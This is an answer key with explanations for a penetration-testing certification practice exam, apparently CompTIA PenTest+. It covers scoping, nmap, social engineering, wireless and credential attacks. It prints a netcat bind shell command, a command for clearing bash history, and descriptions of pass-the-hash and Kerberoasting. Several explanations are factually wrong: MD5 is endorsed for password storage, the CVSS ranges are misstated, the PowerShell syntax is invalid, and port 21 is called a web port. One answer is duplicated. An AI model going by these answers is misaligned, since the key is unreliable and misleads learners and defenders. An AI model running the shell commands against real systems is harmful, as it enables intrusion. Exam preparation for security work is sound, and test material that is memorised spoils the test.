1. A. Advanced persistent threat (APT) is a computer network attack in which a person or group gains unauthorized access to a network and remains undetected for an extended period of time. APTs provide the highest level of threat on the adversary tier list. Many of the techniques used by advanced persistent threat actors are useful for penetration testers, and vice versa. If your persistence techniques aren’t monitored for or detected by the client’s systems, the findings should include information that can help them design around this potential problem.

Answer 419

1. B. The testing agreement should contain a disclaimer indicating that the test is valid only at the point in time that it is conducted and that the scope and methodology requested by the client can impact the comprehensiveness of the test. An NDA specifies what each party in an agreement is allowed to disclose to third parties. An arbitration clause could still result in a settlement that goes against the pen test consultant. A SOW alone won’t protect you against this kind of lawsuit unless it contains a point-in-time clause, discussed earlier.

Answer 420

1. A. An RFID proximity reader can be used to prevent a user from authenticating to a system unless they are physically present at the system.

Answer 421

1. C. Attackers (and penetration testers) seek to undermine the goals of the CIA triad model using the corresponding goals of the DAD triad. The A in DAD stands for alteration, which refers to making unauthorized changes to information or systems. In this scenario, Kimberly has altered the authentication system by adding an unauthorized user account.

Answer 422

1. A. A company policy (corporate policy) is a documented set of guidelines, formulated after an analysis of all internal and external factors that can affect a firm’s objectives, operations, and plans. It is created by the company’s board of directors. Corporate policy lays down the company’s response to known and knowable situations and circumstances. It also determines the formulation and implementation of strategy and directs and restricts the plans, decisions, and actions of the company’s officers in achievement of its objectives. In this scenario, the corporate policy should be very detailed and specific; hence, the corporate systems must store passwords using the MD5 hashing algorithm.

Answer 423

1. A. In an SSL stripping attack, a user sends an HTTPS request to a web server. This is done to ensure that communications between the server and the browser are encrypted. However, the exploit fools the web server into thinking the user wants a standard HTTP connection, and an unencrypted session is established. Unless the user is watching carefully, the user may not realize that this has happened.

Answer 424

1. C. Utilities such as Telnet, rlogin, and rsh should be avoided when conducting a penetration test because they transmit data as clear text over the network. This makes it much easier for defenders to see what you are doing during the test, and you will likely get caught.

Answer 425

1. B. A malicious insider is typically an employee or a contractor that has been legitimately granted a degree of access to an organization’s information and systems. The malicious insider exploits this trust and uses it to compromise the organization’s information or systems.

Answer 426

1. A. A phishing attack was used in this scenario because the malicious email was sent indiscriminately to all the employees within the organization.

Answer 427

1. A. A *stages* communication trigger happens when the penetration test progresses from one phase to another.

Answer 428

1. B and C. Dynamic code analysis as well as fuzz testing are both performed on running code. Because the source code is not required to perform these tests, they can be performed during gray box or black box penetration tests.

Answer 429

1. D and E. If the client’s network itself is in scope, then you need to define the client’s wireless network SSIDs as in-scope. Defining the client’s IP address ranges as in-scope is also important. You must not target third parties, such as neighboring tenants or cloud service providers, without their written permission.

Answer 430

1. C. Penetration testers must take a different approach in their thinking. Instead of trying to defend against all possible threats, they only need to find a single vulnerability that they can exploit to achieve their goals. To find these vulnerabilities, they must think like an adversary who might attack the system in the real world. This approach is commonly known as adopting the hacker mind-set.

Answer 431

1. C. The fact that you don’t have administrative credentials doesn’t mean you have to forgo enumeration and fingerprinting nor does it mean you have to cancel the test. Instead, you could try to craft a spear phishing exploit to trick an internal user into revealing his or her logon credentials.

Answer 432

1. B. Typically, the technical constraints associated with a penetration test identify systems that can be tested and those that can’t be tested. For example, suppose the client uses automated robotic production equipment to make their products. This equipment is very expensive, and they may not want you to include it in the test.

Answer 433

1. D. The final report you write for a penetration test should include a section entitled Methodology. In this section, you describe the penetration testing methodology you used to conduct the test. In this scenario, this would be the appropriate place to indicate that the PCI DSS standard was followed to conduct the test.

Answer 434

1. B. A SMS phishing attack (also called a *smishing* attack) was used in this scenario. A smishing attack leverages text messaging instead of email to conduct a phishing exploit.

Answer 435

1. A. The nslookup command is included with most operating systems, including Windows and Linux, and can be used to resolve an organization’s domain name into its associated IP addresses.

Answer 436

1. D. Passive reconnaissance is also known as open-source intelligence (OSINT). The idea behind passive reconnaissance is to gather information about a target using only publicly available resources. Shodan is a specialized search engine that provides discovery of specific types of computers and devices that are connected to the Internet by using a variety of filters. Peach is a fuzzing tool, OpenVAS performs network vulnerability scans, and CeWL is a custom wordlist generator that searches websites for keywords that may be used in password-guessing attacks.

Answer 437

1. D. A statement of work (SOW) defines what work will be done during an engagement. A SOW is a document that defines the purpose of the test, what tests will be done, what will be created, the timeline for the test to be completed, the price for the testing, and any additional terms and conditions.

Answer 438

1. D. White box tests, sometimes called *crystal box* or *full knowledge* tests, allow testers to see everything inside a network. They are performed with full knowledge of the principal technologies, configurations, and settings that make up the target. Testers will typically have information including network diagrams, lists of systems and IP network ranges, and even credentials to the systems. White box tests are often more complete, as testers can get to every system, service, or other target that is in scope.

Answer 439

1. A. This is an example of a goal-based assessment. The goal is to verify the organization’s physical security using whatever means you desire. A premerger test is usually conducted on an organization prior to it merging with another. A compliance-based test is done to ensure that an organization remains in compliance with governmental regulations or corporate policies. A supply chain test involves testing an organization’s vendors.

Answer 440

1. A. In this example, you are assessing the client’s tolerance for impacts. By including this verbiage within the scope, you protect your organization from litigation if the penetration test truly does knock critical systems offline.

Answer 441

1. C. One of the key weaknesses with the FTP protocol is the fact that it transmits all data between the FTP server and the FTP client as clear text, including authentication credentials. By sniffing the FTP traffic, you may be able to capture FTP usernames and passwords. Some FTP server implementations leverage existing network user accounts and passwords to authenticate FTP connections. So, by capturing FTP authentication credentials, you could potentially be capturing internal network user accounts and passwords too.

Answer 442

1. A and D. The Payment Card Industry Data Security Standard (PCI-DSS) is a set of security controls that businesses are required to implement to protect credit card data. For example, two of the requirements specify that the organization must monitor and audit all access to cardholder data and that access to that data must be restricted on a need-to-know basis.

Answer 443

1. C. When creating your written report of findings after completing a penetration test, you should list the vulnerabilities you discovered in the Findings and Remediation section of the report, along with how you found them and what the client can do to fix the problem. In this example, you should recommend they install the MS17-010 – Critical update from Microsoft in this section.

Answer 444

1. C. In this scenario, since the client’s employees are using dictionary words as passwords, the best way to defeat this is by expanding the password length and adding special characters. Special characters for use in passwords are a selection of punctuation characters that are present on standard U.S. keyboards. These include !"#$%&’()\*+,-./:;\<=\>?@[\]^\_’{|}~. This will make it harder for attackers to break into your client’s system.

Answer 445

1. B. In this scenario, all the ports that the penetration tester discovered have to do with the Web. So, the answer for this question would be that sensitive information may be revealed on the web servers since those were the ports indicated during the vulnerability scan. * Port 21 is TCP/FTP, or the control port. * Port 80 is TCP/HTTP and used for transferring web pages. * Port 443 is TCP/HTTPS, which is the HTTP Protocol over TLS/SSL, for encrypted transmission.

Answer 446

1. A and E. Open-source intelligence (OSINT) is any information that is publicly available and can be passively gathered. Because it is passively gathered, you can’t use methods that actively engage the target organization to gather OSINT. For example, running a vulnerability scan is an active method, as is penetrating the organization’s facility. On the other hand, job postings on the organization’s website as well as résumés of current employees on LinkedIn are both examples of public information. By reviewing these two sources, you may determine what types of systems the organization has deployed.

Answer 447

1. C and D. The device in this example is a little harder to analyze. You can clearly see that it is running a DNS server and a web server. However, not enough information is displayed here to infer much else. One possibility is that it is a wireless router that includes a caching-only DNS server and an embedded web server that is used to configure and manage the device. However, more information would be required to make this determination.

Answer 448

1. B and C. In a typical evil twin attack, the tester first conducts a deauthentication attack to disconnect victims’ wireless devices from the real network. These devices then automatically reconnect to the tester’s wireless access point that has been configured with the same SSID as the target organization. The tester will likely boost the gain on the evil twin’s radios because most wireless network interfaces will default to the access point with the strongest signal.

Answer 449

1. A. Social engineering targets people instead of computers and relies on individuals or groups breaking security procedures, policies, and rules. Social engineering can be done in person, over the phone, by text messages, or by email. In this scenario, the attacker is using the social engineering principle of authority. They were hoping that by the CFO receiving an email from the CEO, there would be no questions asked and the transfer would take place. Authority follows the belief that people will tend to obey authority figures, even if they are asked to perform objectionable acts.

Answer 450

1. A. The default ports used by an LDAP server are 389 (insecure) and 636 (secure). The LDAP protocol is used to query an LDAP-compliant directory server, such as Active Directory or eDirectory. Because directory information sent on port 389 is not encrypted, sniffing the traffic on this port could reveal user account information.

Answer 451

1. A and B. Either the dig axfr @*nameserver target\_domain* or the *host* -t axfr *target\_domain nameserver* command can be used to perform a zone transfer. If it works, then you can gather a fairly detailed list of all the network infrastructure hosts within the target network. Ideally, the target organization has disabled unauthenticated zone transfers on their DNS server. If this is the case, either of the previous commands will return some type of “Transfer Failed” error message.

Answer 452

1. D. Stored cross-site scripting (XSS) is the most dangerous type of cross-site scripting. Web applications that allow users to store data are potentially exposed to this type of attack. Stored XSS occurs when a web application gathers input from a user that might be malicious and then stores that input in a data store for later use.

Answer 453

1. B, C, and D. CompTIA highlights three important post-engagement cleanup activities: * Removing any shells installed on systems during the penetration test * Removing any tester-created accounts, credentials, or backdoors that were installed during testing * Removing any tools that were installed during testing * Remediation of vulnerabilities is a follow-on activity and is not conducted as part of the test. The testers should remove any shells or other tools installed during testing as well as remove any accounts or credentials that they created.

Answer 454

1. B and C. Assigning an executable on Linux the SUID permission allows it to run with the permissions of the file’s owner. If the owner is the root user, then it will execute with root’s superuser permissions. Likewise, assigning an executable the SGID permission allows it to run with the permissions of the owning group. If the owning group is the root group, then it runs with the root group’s permissions.

Answer 455

1. D. This is an example of scope creep. Scope creep is the addition of additional parameters and/or targets to the scope of the assessment. This is a common occurrence and should be planned for in your initial scoping. For example, you and the client could agree on pricing and schedule adjustments that could be made if the scope of the test needs to expand.

Answer 456

1. C. The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, wiping the drive will make it much harder to recover the files from the drive.

Answer 457

1. B. *Goal reprioritization* occurs when either the client or the tester decides to change the focus of the penetration test from the agreed upon scope after the test has already started. In this scenario, the PCI DSS test is being modified to include testing for vulnerability for the new type of ransomware.

Answer 458

1. B and C. Your first response to the common theme of missing updates would to be to investigate whether this creates any vulnerabilities that you could exploit later in your penetration test. Then, you should document the common theme of missing updates so the client can update their best practices to make sure systems are kept up-to-date.

Answer 459

1. D. FIPS 140-2 is a U.S. government security standard that certifies cryptographic modules.

Answer 460

1. D. When enumerating a target network during a white box penetration test, you will likely gather a great deal of information. For example, you will probably want to enumerate all subnets, hosts, and domains on the network.

Answer 461

1. A. The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, physically destroying inexpensive flash drives will make it much harder to recover the data from the reports.

Answer 462

1. A and D. Sample application requests are typically used to test applications (desktop or web) that have been developed in-house. Applications developed in-house aren’t usually subjected to the same level of scrutiny as commercial applications, which make them possible attack vectors that can be exploited. Sample application requests aren’t generally required for commercial applications, such as Word, Excel, or Photoshop, because their weaknesses are already well-documented.

Answer 463

1. A. Netcat can be used to set up a Telnet server in a matter of seconds. You can specify the shell you want Netcat to run at a successful connection with the -e parameter. In this scenario, the proper syntax would be nc -lp 444 -e /bin/bash. The nc tells Windows to run the nc.exe file with the following arguments: * -l: Specifies listen mode, for inbound connections * -p: Specifies a port to listen for a connection on * -e: Tells what program to run once the port is connected to (cmd.exe) * -v: Be verbose, printing out messages on standard error, such as when a connection occurs

Answer 464

1. C. Requiring a user to supply a biometric scan (something you are) along with a PIN (something you know) constitutes multifactor authentication.

Answer 465

1. B. A full scan interrogates each host discovered on the target network. Because it uses intrusive methods to do this, a full scan is usually detected (and possibly blocked) quickly by IDS or IPS devices.

Answer 466

1. E. None of the responses listed in this question can be reasonably inferred from the information displayed in Zenmap. You know that it is a Windows server and that it is most likely a domain controller, but you can’t infer much else from the information given.

Answer 467

1. C. In this scenario, the best approach would be to determine the client’s tolerance to impact by conducting an impact analysis. Since this vulnerability scanner may have the potential of bringing their system down, you need to know what the client’s tolerance levels are and how a down system will affect the client. You also need to make sure the client is aware of all the risks associated with running the scanner.

Answer 468

1. C. The Common Vulnerability Scoring System (CVSS) is an industry standard for assessing the severity of security vulnerabilities. It provides a technique for scoring each vulnerability on a variety of measures. Security analysts often use CVSS ratings to prioritize response actions. Each measure is given a descriptive rating and a numeric score.

Answer 469

1. C. In a bluejacking wireless exploit, unsolicited messages are sent over a Bluetooth connection to wireless devices, such as a mobile phone.

Answer 470

1. A. A nondisclosure agreement (NDA) is a legal agreement that protects information that a contractor may discover during a penetration test. It forbids the contractor from revealing such information to unauthorized parties.

Answer 471

1. B. The device in this example is most likely a Windows workstation. This is evidenced by the fact that the default SMB/CIFS file sharing ports are open on the system.

Answer 472

1. D. Privilege escalation attacks are frequently categorized into two major types: vertical and horizontal. Vertical escalation attacks focus on testers gaining higher privileges. Horizontal escalation attacks move sideways to other accounts or services that have the same level of privileges. An unquoted service path is a vulnerability in Windows. When a service is started, Windows tries to locate it. Usually services are well-defined with quotation marks. But, there are times when a service path might contain spaces or are not surrounded by quotation marks. Testers can use the unquoted service paths to escalate privileges.

Answer 473

1. C. To implement a DLL hijacking exploit, the penetration tester needs to have read/write permissions to the target file system. Using unsecure file and folder permission can make this task much easier to accomplish.

Answer 474

1. C. A downgrade attack is a form of attack in which a tester forces a network channel to switch to a less secure or unprotected data transmission standard. Downgrading the protocol is one component of a man-in-the-middle type attack and is used to intercept encrypted traffic. Downgrade attacks work by causing the client and server to use a less-secure protocol. In this scenario, since you are trying to capture all unencrypted web traffic, you would want to implement an HTTP downgrade attack.

Answer 475

1. B. In this scenario, you and your colleague are discussing something you have. Physical objects may be used as authentication mechanisms. Organizations seeking to protect sensitive information and critical resources should implement multifactor authentication. Multifactor authentication implementations combine two or more authentication mechanisms coming from different authentication categories. The authentication categories are something you know, something you have, and something you are.

Answer 476

1. A. A dictionary attack is a method of breaking into a password-protected computer or server by thoroughly entering every word in a dictionary as a password. Dictionary attacks work because many computer users use ordinary words as passwords. Dictionary attacks rely on a prebuilt dictionary of words. In many cases, penetration testers can add additional specific dictionary entries to a dictionary file for their penetration test based on knowledge; this can be beneficial in performing a dictionary attack. In this scenario, the penetration tester used social media to find additional keywords that may be beneficial in a dictionary attack.

Answer 477

1. B. The host is most likely running Windows. TCP ports 139, 445, and 3389 are all commonly used for Windows file sharing services. While these ports could also be used on other operating systems (such as a Linux system with the SMB daemon running), it is more likely to be a Windows host.

Answer 478

1. B. In a bluesnarfing wireless exploit, an unauthorized Bluetooth connection is established with a wireless device, such as a mobile phone. That connection is then used to steal information from that device.

Answer 479

1. B. The penetration tester in this scenario is using an exploit Kerberoasting. Any valid domain user can request an SPN for a registered service. The Kerberos ticket received as a result can be taken offline and cracked, potentially exposing the service account password. This can allow privilege escalation because it’s not uncommon for the service account to have administrator-level permissions to the local server.

Answer 480

1. B. Lock bypass occurs when an attacker prevents a door’s locking mechanism from working. In this example, this was done by placing a wooden wedge in the door jamb, preventing the door from closing completely and preventing the locking mechanism from engaging.

Answer 481

1. B. It is important that all penetration testers keep carefully written logs of the actions they take during an assessment. These logs should identify what the tester did, when they did it, what system(s) they were using, what system(s) they were attacking, and what the results were. You should avoid relying upon tester or client memories alone. They tend to be faulty and incomplete.

Answer 482

1. B. In this example, the nmap utility was used to simply list available targets. This is done by running nmap with the –sL option. This causes nmap to list hosts, but not actually scan them.

Answer 483

1. B and C. Most likely, the client will want to know what kind of report you are going to provide them with once the test is complete. They will also want to know how long it will take to remediate their systems as a result of the test.

Answer 484

1. A and D. Both spear phishing and whaling require the penetration tester to conduct extensive research to identify high-value target individuals within the organization.

Answer 485

1. C. Among other things, the term *situational awareness* refers to a state of common understanding between all members of the penetration testing team to ensure that testing activities are planned and coordinated to occur at the appropriate time.

Answer 486

1. A and C. Advanced persistent threats (APTs) are typically aimed at high-value targets, such as governments, defense contractors, multinational organizations, and financial organizations. Online learning websites, dental practices, and even community colleges are typically not valuable enough as targets to warrant an APT.

Answer 487

1. A. This discussion should have occurred during the planning and scoping phase. The penetration testing firm and the client should have agreed upon the rules to complete the assessment before the test began. This information should have been recorded in a written statement of work (SOW) that clearly identified the tools and techniques the penetration testers were allowed to use and the risks of using them.

Answer 488

1. B. In this scenario, since the penetration tester discovered a critical vulnerability, the tester should immediately alert the client with the details of the findings.

Answer 489

1. A and E. You can enter /bin/bash ~/myexploit or chmod u+x ~/myexploit to make the script execute.

Answer 490

1. C. Verbal permission is usually considered insufficient. Before beginning a penetration test, you must obtain a signed agreement from senior management giving you permission to conduct the test. This agreement will function as a “get out of jail free” card should your activities be reported to authorities. The other parameters described in this scenario have been defined appropriately.

Answer 491

1. B. The –D option causes nmap to send scans from a spoofed IP address. You can specify one or more fake source IP addresses using this option.

Answer 492

1. D. In this scenario, the client has determined that the risk is an acceptable one and will not take measures to control it. Typically, this happens when an organization determines that the cost of removing or controlling a risk exceeds the cost of a security incident arising from that risk.

Answer 493

1. B. In this scenario, you need to test the modified exploit before actually attacking the target servers to make sure it works and doesn’t have any unintended consequences. An effective way to do this is to use your enumeration information to re-create the target systems as virtual machines in a lab environment and test the modified exploit. This process is called *proof-of-concept development*.

Answer 494

1. D. The nmap 192.168.1.1 -sU command causes the nmap utility to conduct a UDP port scan of the specified target system.

Answer 495

1. A. The PCI -DSS standard is an industry standard for ensuring that organizations that process credit cards comply with certain security requirements. Because you are testing the client’s adherence to these requirements, you are conducting a compliance-based assessment.

Answer 496

1. D. Egress sensor bypass occurs when an attacker manipulates an egress sensor to unlock a door. In this scenario, the moving compressed air from the air duster is much colder and denser than the surrounding air, causing the egress sensor to think someone is exiting the building and unlock the door.

Answer 497

1. D. The “Account lockout threshold” Group Policy setting determines the number of failed logon attempts a user is allowed to make before the account is locked. A locked account can’t be used again until it is unlocked by an administrator or the lockout period for the account has elapsed. This policy setting can help prevent brute-force attacks by locking an account after only a few guessing attempts.

Answer 498

1. C. In this scenario, since it is port 23 that is open, this indicates the server you are on is a Telnet server. Telnet is a user command and an underlying TCP/IP protocol for accessing remote computers. Using Telnet, an administrator or another user can access someone else’s computer remotely. Telnet uses a command-line interface. Information transmitted between the Telnet server and client is sent unencrypted. This means that any authentication information may also be captured.

Answer 499

1. A. Before a wireless network interface can be used to capture wireless network traffic, it must be configured to run in monitor mode on the specific channel used by the transmitting access point.

Answer 500

1. D. Code testing is often done using static or dynamic code analysis along with testing methods like fuzzing and fault injection. Once changes are made to the code and it is deployed, it must be retested to ensure that the changes didn’t create any new security issues. Since we are only reviewing the code in this scenario, we will be conducting a static code analysis. Static code analysis, also known as source code analysis, is done by reviewing the code of an application. Since static analysis uses the source code, it can be seen as a type of white-box testing with full visibility. This can allow testers to find problems that other tests might fail to spot.

Answer 501

1. A. The greatest security risk associated with a biometric fingerprint reader is the fact that they can be fooled by a fake fingerprint. In an episode of the television show *MythBusters* several years ago, the cast was able to defeat a fingerprint reader by lifting an authorized user’s fingerprint from a cup. In this scenario, you should probably recommend that the client upgrade to a facial recognition authentication system as they have been proven to be more difficult to fool.

Answer 502

1. B. Under Ports Used, notice that port 80 TCP is open on the device. This indicates that it most likely is running an HTTP web server.

Answer 503

1. B. The nmap 192.168.1.1-254 -sn command causes the nmap utility to scan the specified range of IP addresses for hosts. It lists all the hosts found without actually scanning any of their ports.

Answer 504

1. C. In this example, the nmap utility was used to run a UDP scan. However, the –vv option was included to greatly increase the verboseness of the output.

Answer 505

1. C. In this scenario, it would be important to put the risk tolerance of the client’s organization into the executive summary. Risk tolerance is basically how much risk an organization is willing to take on where their investments are concerned. With any type of investment, there is always risk, but how much risk one is able to withstand is their risk tolerance. This may be different for every organization. You cannot put a set value on risk tolerance.

Answer 506

1. B. In this scenario, the best option to tell the client would be by using smart cards and PINs. Multifactor authentication (MFA) is a security system that requires more than one method of authentication from separate categories of credentials to verify the user’s identity for a login or other transaction. The authentication categories are something you know, something you have, and something you are.

Answer 507

1. C. A downgrade attack is a form of attack in which a tester forces a network channel to switch to a less secure or unprotected data transmission standard. Downgrading the protocol is one component of a man-in-the-middle type attack and is used to intercept encrypted traffic. Downgrade attacks work by causing the client and server to use a less-secure protocol. In this scenario, since you are trying to capture all unencrypted web traffic, you would want to implement an HTTP downgrade attack.

Answer 508

1. C. In this scenario, the tester is using the Metasploit PSEXEC module. Using Metasploit, a tester can exploit a system and perform a hash dump to extract the systems hashes. The tester can then use the PSEXEC module to pass the hash to another system on the network. The example shows how the SMBPASS option is set and the pass-the-hash attack executed, resulting in access to a remote system within the network. A pass-the-hash attack is an exploit in which a tester takes a hashed user credential and, without cracking it, reuses it to deceive an authentication system into creating a new authenticated session on the same network.

Answer 509

1. B. When creating an associative array in a PowerShell script, you use the following syntax: *array\_name* = [{"*element\_name*":"*value*"}]. In this example, the line Target = [{"HostName":"FS1"}] assigns a value of FS1 to the element named HostName within the Target array.

Answer 510

1. B. The –oN option causes nmap to write the output from the scan to a standard text file. You must specify a filename with this option.

Answer 511

1. B and D. In this scenario, dumpster diving was used to find the discarded access badge. Then badge cloning was used to create a fake badge.

Answer 512

1. A. A while loop will keep processing over and over until the specified condition evaluates to false.

Answer 513

1. C. Many penetration testing tools may be covered by export restrictions. The United States prohibits the export of some types of software and hardware, including encryption tools. If you transfer these tools internationally over the Internet, you could be arrested.

Answer 514

1. B. Mimikatz is an open source utility that enables the viewing of credential information from the Windows Local Security Authority Subsystem Service (LSASS) using its sekurlsa module, which includes plaintext passwords, and Kerberos tickets, which can then be used for attacks such as pass-the-hash and pass-the-ticket. In this scenario, however, the question states “over the wire.” Mimikatz is the only tool that cannot be used that way.

Answer 515

1. D. In this scenario, the IP address of your computer was blacklisted. Blacklisting is part of your client’s defensive practices. Your scans were detected by an intrusion protection system (IPS), and as a result, the IP address used by your computer was entered on a blacklist. Blacklisting works by maintaining a list of applications and other “known” information. In this case, your IP address was used to deny you access to the network.

Answer 516

1. D. The rules of engagement (ROE) should have been clearly defined and signed by both parties before the penetration test begins. Not having the ROE in place exposes your organization to potential litigation should something go wrong during the testing process. The vetting of a new client occurs during the process of scoping the test and creating the ROE document. An MSA defines terms that will govern future agreements.

Answer 517

1. B. The XLM Schema Definition (XSD) is a W3C specification that identifies how to define elements within an XML document.

Answer 518

1. C. Whitelisting testers in intrusion prevention systems (IPSs), web application firewalls (WAFs), and other security devices will allow them to perform their tests without being blocked. For a white box test, this means that testers won’t spend time waiting to be unblocked when security measures detect their efforts. Black box and red team tests are more likely to result in testers being blacklisted or blocked by security measures. In this scenario, the penetration tester should tell the client that testing should focus on the discovery of potential security issues through all in-scope systems and not just on determining the effectiveness of active defenses such as the IPS.

Answer 519

1. D. In a DOM XSS exploit, the attacker exploits weaknesses in the victim’s web browser. Typically, outdated browsers are most susceptible to this type of exploit. This is considered to be a client-side XSS attack.

Answer 520

1. C. System hardening, also known as operating system hardening, helps minimize security vulnerabilities. The purpose of system hardening is to get rid of as many security risks as possible. This is usually done by removing all nonessential software programs and utilities from the computer. The goal of systems hardening by removing unused programs, accounts functions, applications, ports, permissions, access, etc., is that attackers have fewer opportunities to gain access to your network. There are several types of system hardening activities. They include the following: * Application hardening * Operating system hardening * Server hardening * Database hardening * Network hardening

Answer 521

1. B. The term *de-escalation* refers to the process of communicating between the client and the tester to dial back the intensity of exploits used during the penetration test because of the adverse effects they may be having on the network.

Answer 522

1. A. A credentialed vulnerability scan requires you to first authenticate to the network, preferably with an administrative-level account. Because administrative credentials are used, this type of scan usually identifies the most vulnerabilities.

Answer 523

1. C. One way to harden a server system is to reconfigure it to save its log entries to a dedicated logging server somewhere else on the network. This makes it harder for an attacker to cover his or her tracks after a compromise because the log files aren’t stored locally.

Answer 524

1. A. Aircrack-ng is a complete suite of tools to assess wireless network security. It focuses on different areas of Wi-Fi security. * Monitoring: Packet capture and export of data to text files for further processing by third-party tools. * Attacking: Replay attacks, deauthentication, fake access points, and others via packet injection. * Testing: Checking Wi-Fi cards and driver capabilities. * Cracking: Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access 2 – Pre-Shared Key (WPA PSK).

Answer 525

1. D. The proxychains tool allows you to perform penetration test tasks against a target organization and make the network traffic generated look like it came from an intermediary proxy system.

Answer 526

1. A and B. The Payment Card Industry Data Security Standard (PCI-DSS) is a set of security controls that businesses are required to implement to protect credit card data. For example, two of the requirements specify that the organization must restrict physical access to all cardholder data and that the CDE network be isolated from the rest of the network.

Answer 527

1. A. Usually, when NAC is implemented with IPSec, network devices (such as desktops and laptops) must meet company security policies before they are allowed to connect to the internal secure network. If they do, they are assigned a digital certificate that allows them to communicate with other systems on the internal secure network. Otherwise, they are placed on an isolated remediation network until they come into compliance. To bypass NAC, certificate pinning can be used to assign a digital certificate to the testers’ systems without proving they are in compliance every time they connect.

Answer 528

1. A. NetBIOS is a transport protocol used by Windows systems to share resources, such as shared folders or printers. Once an attacker identifies that port 139 is open on a device, NBTSTAT can be used to footprint the device. For example, you could discover the device’s computer name and identify whether it is a workstation or a server. All of this information can be gathered without any kind of authentication.

Answer 529

1. A. In this scenario, there are several high-numbered ports listening on a public web server. The best recommendation would be to disable unneeded services since the client uses only port 443. The unnecessary services can pose a security risk because they increase the attack surface, providing a potential attacker with additional ways to try to exploit the system.

Answer 530

1. B. In a USB key drop exploit, some type of malware is usually loaded on a flash drive. That drive is then deliberately left somewhere that an employee of the target organization will likely find it. The goal is for the employee to plug it in to see what it contains. When this happens, the malware is automatically loaded on the victim’s computer.

Answer 531

1. C. The –T option configures the speed at which nmap runs vulnerability scans. In this scenario, the subnet is potentially huge, with more than 16 million possible IP addresses. Running nmap with the –T0 option on a subnet this large will take a long time to complete.

Answer 532

1. B. You should recommend they use LDAPS on port 636 to manage user accounts. LDAPS is secured with SSL. Standard LDAP on port 389 transmits data on the network as clear text. This means the administrative user credentials you submit to access the directory service itself as well as any credentials of the users being managed are transmitted as clear text.

Answer 533

1. B. The bash history keeps a record of all commands executed by a tester on the Linux command line. This allows the tester to easily run previously executed commands by using the up and down arrow keys to scroll through the command history file. The main reason for removing command-line history from the Linux terminal is to prevent another user from using the tester’s previous commands. To delete or clear all the entries from bash history, use the history command with the -c option: $ history -c.

Answer 534

1. B. Hacktivists may want to make a political or social point. Hacktivists aren’t typically doing attacks for money. They are individuals or groups of hackers who get together and see themselves as fighting for injustice. Hacktivists employ the same tools and tactics as hackers.

Answer 535

1. A and D. The process of enumeration involves connecting to each host discovered on the network segment and identifying key information, including the services each host is running as well as the version number of the installed operating system.

Answer 536

1. D and E. OWASP ZAP as well as Nessus can be used to scan a target for vulnerabilities.

Answer 537

1. A and C. In this scenario, you used deception and social engineering to gain access to the target organization’s physical network.

Answer 538

1. A. Penetration testers seek to undermine the goals of the CIA triad model using the corresponding goals of the DAD triad. The first D in DAD stands for disclosure, which refers to gaining unauthorized access to information or systems. In this scenario, Natasha has gained access to information within the backend database that she should not have access to.

Answer 539

1. A and D. In this scenario, the wireless network can be hardened by using directional access points. This will help prevent the signal from emanating into the parking lot. In addition, DHCP should be disabled on the wireless network. While this makes administration much more difficult, it also prevents attackers who compromise the wireless network from automatically receiving all the configuration information they need to access network resources.

Answer 540

1. C. In a clickjacking exploit, the tester adds transparent layers to a web page in an attempt to fool a user into clicking a hidden button or link on a transparent layer. This allows the tester to hijack user clicks and send them to a different website (such as a credential harvesting site).

Answer 541

1. C. One of the first steps when looking to gain access to a host, system, or application is to enumerate usernames. Once usernames are guessed, targeted password–based attacks can then be attempted. A RID cycling attack attempts to enumerate user accounts through null sessions. If a tester specifies a password file, it will automatically attempt to brute-force the user accounts when it’s finished enumerating. So, in this scenario, attempting RID cycling will be the next step the tester should try.

Answer 542

1. B. Any CVSS score between 4.0 and 6.0 is considered to be in the Medium Risk category. Therefore, a CVSS score of 5.3 indicates that this is a medium-risk vulnerability.

Answer 543

1. A. The Browser Exploitation Framework (BeEF) is designed for this type of attack. BeEF provides an automated toolkit for using social engineering to take over a client’s web browser. The tester can then use various phishing and social engineering techniques to get employees to visit the site.

Answer 544

1. A. A credentialed vulnerability scan requires you to first authenticate to the network, preferably with an administrative-level account. Because administrative credentials are used, this type of scan most closely approximates the perspective of an internal administrator.

Answer 545

1. C. Any CVSS score between 6.0 and 10.0 is considered to be in the High Risk category. Therefore, a CVSS score of 7.2 indicates that this is a high-risk vulnerability.

Answer 546

1. C. The impacket penetration testing tool consists of a collection of Python classes used for low-level access to network protocols, such as SMB and MSRPC protocols.

Answer 547

1. C. The test command can be used from within an if/then flow control structure to evaluate whether a specified condition is true.

Answer 548

1. D. A false positive is when the system incorrectly accepts a biometric sample as being a match. Biometric sensors sometimes make mistakes for a number of reasons. The identification process compares a biometric, such as a fingerprint or iris scan that is presented to the system, against all entries in a database for a match. This is referred to as a *one-to-many* search. Live biometrics change due to age, climate, or a possible injury on a finger. Vendors refer to these threshold settings as false acceptance rates (FARs) and false rejection rates (FRRs).

Answer 549

1. A. The \*\*\* characters in the output of the traceroute command indicate that the router for that particular hop of the route is up and forwarding traffic, but it isn’t allowed to respond to the pings used by the traceroute command.

Answer 550

1. D. A white box penetration test provides complete access to the internal network, including configuration settings of key infrastructure devices such as routers, switches, access points, and servers. For this reason, white box tests are sometimes referred to as full-knowledge tests because they provide full access and visibility.

Answer 551

1. D. A stealth scan enumerates hosts on the target network by manipulating the TCP three-way handshake. First, it sends the target a SYN packet. If a SYN-ACK is received, then the scanner knows that the destination host exists. Rather than complete the connection by sending the target an ACK packet, the scanning host resets the connection by sending a RST packet.

Answer 552

1. C. A scope creep, or the addition of more items and targets to the scope of the assessment, is a constant menace for penetration testing. During the scoping phase, a tester is unlikely to know all of the details of what may be uncovered, and during the assessment itself, a tester may encounter unexpected new targets. Scope creep refers to how a project’s requirements tend to increase over a project life cycle.

Answer 553

1. D and E. The nmap 192.168.1.0/24 command causes the nmap utility to scan every system on the subnet, from .1 to .254. Likewise, the nmap 192.168.1.1-254 command causes the nmap utility to scan every system on the subnet, from .1 to .254.

Answer 554

1. B. The Sarbanes-Oxley act sets standards for publicly traded U.S. companies with respect to security policies, standards, and controls. For example, it sets standards for network access, authentication, and security.

Answer 555

1. A and D. Rather than purchasing a Windows system, you can simply create the exploit code on your Linux system and then cross-compile the code such that it can run on Windows systems. Various Linux utilities are available that can do this for you.

Answer 556

